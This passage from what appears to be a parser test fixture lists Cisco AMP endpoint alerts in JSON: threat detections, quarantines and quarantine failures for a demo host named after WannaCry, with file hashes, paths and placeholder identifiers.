"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 99186, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064600", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 100372, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275399255031906", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 812000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 101558, + "process.hash.md5": "ad7b9c14083b52bc532fba5948342b98", + "process.hash.sha1": "ee8cbf12d87c4d388f09b4f69bed2e91682920b5", + "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "process.name": "cmd.exe", + "process.pid": 3200, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275399255031905", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 235000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 103091, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2708, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275399255031904", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 172000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 104633, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064599", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 105894, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064597", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 423000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 107014, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064596", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 377000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 108200, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064594", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 33000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 109386, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064606", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 907000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 110571, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064605", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 907000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 111942, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064607", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 907000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 113313, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064604", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 891000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 114684, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064603", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 876000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 116055, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064602", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 845000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 117426, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064601", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 798000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 118797, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064598", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 767000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 120168, + "related.hash": [ + 